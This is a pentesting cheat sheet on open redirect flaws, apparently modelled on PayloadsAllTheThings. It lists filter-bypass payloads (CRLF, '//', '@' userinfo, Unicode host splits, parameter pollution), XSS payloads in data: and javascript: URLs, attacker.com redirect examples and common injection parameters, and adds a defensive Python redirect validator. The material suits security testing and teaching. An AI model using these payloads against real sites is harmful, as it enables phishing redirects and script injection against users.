# Open Redirect

Example:

> <https://google.com/?redirect_to=https://gmail.google.com>

An attacker could change it to:

> <https://google.com/?redirect_to=https://attacker.com>

Keep an eye out for URL parameters with names such as `url=`, `redirect=`, `next=`, etc. In some cases, redirect parameters are labelled with just a single character, such as `r=` or `u=`.

When a user accesses a resource without an authenticated session, web applications usually redirect the user to the login form URL, which carries the link of the requested resource as a URL parameter. After a successful login, the application uses that parameter to send the user back to the URL they originally tried to reach. Therefore, open redirect vulnerabilities usually occur in login forms.

## Bypass payloads

Some applications filter, whitelist or blacklist the redirect parameter before performing the redirect.

### [PayloadsAllTheThings - Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect)

Fuzz the parameter with all payloads from PayloadsAllTheThings.

#### Fuzzing

Replace `www.whitelisteddomain.tld` in *Open-Redirect-payloads.txt* with the domain that is whitelisted in your test case.

To do this, set `WHITELISTEDDOMAIN` (shown here with the value `www.test.com`) to your test case's domain:

```bash
WHITELISTEDDOMAIN="www.test.com"   # domain whitelisted by the target; dots in the sed pattern are escaped so they match literally
sed "s/www\.whitelisteddomain\.tld/$WHITELISTEDDOMAIN/" Open-Redirect-payloads.txt > "Open-Redirect-payloads-burp-$WHITELISTEDDOMAIN.txt"
echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> "Open-Redirect-payloads-burp-$WHITELISTEDDOMAIN.txt"   # appends the domain with its TLD repeated, e.g. https://www.test.com.com
```

### Filter Bypass

Shopify login open redirect: the `checkout_url` value ended up appended to the store hostname

```
http://mystore.myshopify.com/account/login?checkout_url=attacker.com
redirects to:
http://mystore.myshopify.com.attacker.com
```

Using a whitelisted domain or keyword as a prefix of the attacker's host (defeats filters that only check for the presence of the whitelisted string)

```
www.whitelisted.com.evil.com redirect to evil.com
```

Using CRLF to bypass a "javascript" blacklisted keyword

```
java%0d%0ascript%0d%0a:alert(0)
```

Using a protocol-relative "//" URL to bypass a "http" blacklisted keyword

```
//google.com
```

Using "https:" without slashes to bypass a "//" blacklisted keyword

```
https:google.com
```

Using `\/\/` to bypass a `//` blacklisted keyword (browsers treat `\/\/` as `//`)

```
\/\/google.com/
/\/google.com/
```

Using "%E3%80%82" (the ideographic full stop 。, which browsers map to ".") to bypass a "." blacklisted character

```
/?redir=google。com
//google%E3%80%82com
```

Using a null byte "%00" to bypass a blacklist filter

```
//google%00.com
```

Using HTTP parameter pollution (supplying the redirect parameter twice)

```
?next=whitelisted.com&next=google.com
```

Using the "@" character: everything before "@" is parsed as userinfo, so the browser goes to the host after the "@"

```
http://www.theirsite.com@yoursite.com/
```

Placing the whitelisted domain in the path of the attacker's URL (defeats filters that match the domain anywhere in the string)

```
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
```

Host/split via Unicode normalization: characters such as ℀ (normalized to `a/c`) or the fullwidth solidus ／ (normalized to `/`) pass a hostname check before normalization and split the host afterwards

```
https://evil.c℀.example.com ---> https://evil.ca/c.example.com
http://a.com／X.b.com
```

XSS via the redirect URL when it is reflected into a JavaScript variable

```
";alert(0);//
```

XSS from a data: URL

```
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
```

XSS from a javascript: URL

```
http://www.example.com/redirect.php?url=javascript:prompt(1)
```
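The defender-side counterpart to the login-form redirect described at the top of the page and to the bypass list above is a validator that never compares the raw parameter against a keyword. The following is an added example, not code from the original page or from any of the referenced projects: it parses the target, refuses control characters, backslashes, userinfo, non-ASCII or percent-encoded hostnames, non-http(s) schemes and protocol-relative paths, compares the hostname exactly against an allowlist, and refuses a parameter that is supplied more than once. `ALLOWED_HOSTS`, `safe_redirect_target`, `redirect_from_query` and `nfkc_form` are names chosen for this example; the allowlist is constructed.

```python
# Added example (not from the original page): a server-side redirect target
# validator that refuses the bypass patterns listed above.
import re
import unicodedata
from typing import Optional
from urllib.parse import parse_qs, urlsplit, urlunsplit

ALLOWED_HOSTS = {"www.test.com", "test.com"}  # constructed allowlist

_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
_ASCII_HOST = re.compile(r"[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?")


def safe_redirect_target(raw: str, allowed_hosts=ALLOWED_HOSTS) -> Optional[str]:
    """Return a rebuilt redirect URL, or None when the target must be refused."""
    if not raw:
        return None
    # CR/LF and NUL tricks (java%0d%0ascript, %00): reject any control character
    # before parsing, because newer urlsplit() silently strips some of them.
    if _CONTROL_CHARS.search(raw):
        return None
    # Browsers treat "\" like "/", so \/\/host is protocol-relative; refuse it.
    if "\\" in raw:
        return None
    try:
        parts = urlsplit(raw)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    scheme = parts.scheme.lower()
    # Refuses javascript:, data: and anything else that is not plain http(s).
    if scheme not in ("", "http", "https"):
        return None
    # "https:google.com" parses as a scheme without a netloc; never accept that shape.
    if scheme and not parts.netloc:
        return None
    if parts.netloc:
        # Userinfo trick: http://www.test.com@evil.example/ has username www.test.com.
        if parts.username is not None or parts.password is not None or port is not None:
            return None
        host = parts.hostname or ""
        # Only plain ASCII hostnames are compared: this rejects percent-encoded
        # bytes (google%E3%80%82com, google%00.com) and Unicode look-alikes
        # (ideographic full stop, fullwidth solidus, the ℀ ligature).
        if not host.isascii() or not _ASCII_HOST.fullmatch(host):
            return None
        # Exact allowlist match: www.test.com.evil.example is NOT www.test.com.
        if host not in allowed_hosts:
            return None
        return urlunsplit((scheme or "https", host, parts.path or "/", parts.query, ""))
    # No host: accept only a single-slash site-relative path. "//host" already
    # landed in the netloc branch; "google.com" (no leading slash) and "////host"
    # (path "//host", which browsers read as protocol-relative) are refused.
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return None
    return urlunsplit(("", "", parts.path, parts.query, ""))


def redirect_from_query(query: str, param: str = "next",
                        allowed_hosts=ALLOWED_HOSTS) -> Optional[str]:
    """Read the redirect parameter from a query string; refuse it when it is
    supplied more than once (parameter pollution) or fails validation."""
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    if len(values) != 1:
        return None
    return safe_redirect_target(values[0], allowed_hosts)


def nfkc_form(host: str) -> str:
    """Illustrates the host/split problem: NFKC turns ℀ into "a/c" and ／ into "/",
    so a host that passed a check before normalization splits afterwards.
    Validate the exact string you will emit and never normalize after checking."""
    return unicodedata.normalize("NFKC", host)


if __name__ == "__main__":
    for candidate in ("/account/orders?id=3", "https://www.test.com/cart",
                      "//google.com", "https:google.com", "\\/\\/google.com/",
                      "http://www.test.com@evil.example/",
                      "http://www.test.com.evil.example/", "javascript:prompt(1)"):
        print(f"{candidate!r:40} -> {safe_redirect_target(candidate)!r}")
    print(redirect_from_query("next=www.test.com&next=google.com"))
    print(nfkc_form("evil.c℀.example.com"))
```

The validator returns a URL it rebuilt from the parsed components rather than echoing the parameter, so stray userinfo, ports and fragments never reach the `Location` header; in the login flow described above, the application would store only the value this function returns.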

## Common injection parameters

```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
```

## References

<https://book.hacktricks.xyz/pentesting-web/open-redirect>\
<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect>\
<https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html>
